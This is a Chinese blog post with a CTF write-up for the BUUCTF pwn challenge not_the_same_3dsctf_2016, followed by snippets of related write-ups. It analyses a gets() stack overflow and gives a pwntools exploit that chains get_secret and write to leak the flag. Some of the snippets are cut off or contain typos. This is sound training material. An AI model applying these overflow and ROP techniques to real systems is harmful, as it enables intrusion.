[BUUCTF-pwn]——not_the_same_3dsctf_2016

最新推荐文章于 2025-02-20 12:52:02 发布
原创 最新推荐文章于 2025-02-20 12:52:02 发布 · 1.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

not_the_same_3dsctf_2016

  • 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016
    首先checksec一下,看看32位程序
    在这里插入图片描述
    在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp在这里插入图片描述
    shift+F12看下,发现了flag.txt这种敏感 字符串
    在这里插入图片描述
    在这里插入图片描述
    找到调用的函数get_secret函数
    在这里插入图片描述
    函数调用后,flag储存在fl4g里面,我们找到fl4g的位置
    在这里插入图片描述
    找到可以输出的write函数
    在这里插入图片描述
    下面我们就可以写我们的exploit了

exploit

from pwn import *
p = remote("node3.buuoj.cn",25722)
write_addr = 0x0806E270
flag_addr = 0x080ECA2D 
get_secret = 0x080489A0
payload='a'* 0x2d + p32(get_secret) + p32(write_addr) + p32(0) + p32(1) + p32(flag_addr) + p32(45)
p.sendline(payload)
p.interactive()

嘻嘻,如果有帮助的话,可以点个赞哦 😃

当然,打赏就更加谢谢各位了,一分钱你买不了吃亏.嘿嘿🤭

BUUCTF - PWNnot_the_same_3dsctf_2016
古月浪子的博客
03-27 1624
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 565
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTFPWNnot_the_same_3dsctf_2016
m0_55368674的博客
01-12 584
BUUCTF - PWNnot_the_same_3dsctf_2016题解
BUUCTF-PWN-not_the_same_3dsctf_2016
Henlenl的博客
05-19 245
文章目录查看文件信息IDA静态分析exp 查看文件信息 开了个NX保护 IDA静态分析 开始看上去 其实就是利用gets()来溢出的 我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串 我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 2266
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 293
本题目本地与远程得用两种方案打。
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1566
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
not_the_same_3dsctf_2016
最新发布
2301_81060697的博客
02-20 325
from pwn import* from LibcSearcher import LibcSearcher r=remote("node5.buuoj.cn",27164) elf=ELF(r"C:\Users\lezho\Desktop\misc\not_the_same_3dsctf_2016") printf=elf.symbols["printf"] print(hex(puts_plt)) get_flag=0x080489A0 fla
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 618
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 374
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
BUUCTF(pwn)not_the_same_3dsctf_2016
半岛铁盒的博客
03-28 303
from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e270 payload='a'*0x2d+p32(get_secret)+p32(write)+p32(0)+p32(1)+p32(flag)+p32(45) p.senline(payload) p.interactive() 有疑问的欢迎留言❄
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1813
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
[BUUCTF]-PWNnot_the_same_3dsctf_2016解析
2301_79326813的博客
12-03 705
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1579
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 4050
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
not_the_same_3dsctf_2016
m0_52231248的博客
11-09 245
not_the_same_3dsctf_2016 Ubuntu16 checksec一下 ida: Gets函数存在溢出点offest=0x2d Main函数上面就是后门函数,给我们将flag.txt读入bss段 找到读入的flag地址 我们只需要printf打印一下就行了 远端还需要我们正常退出函数,找一下exit() 因为是静态编译的,所以基本所有函数都会有直接构造exp: from pwn import* context(log_level="deb.
buuctf not_the_same_3dsctf_2016
carol2358的博客
04-16 322
一开始没看到get_secret函数,去用mprotect去做了,结果报错卡住了。 思路是用write把get_serect写到bss里的flag显示出来,write bss就可以。 exp: from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux'...
buuctfnot_the_same
qq_42728977的博客
02-19 675
题目:not_the_same_3dsctf_2016 环境:ubuntu14 漏洞点:栈溢出、mprotect、shellcode 思路:使用mprotect更改内存权限,通过栈溢出更改程序流程,读入shellcode并执行 参考链接: get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这,感觉这个题很简单啊。 再看看函数列表...
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值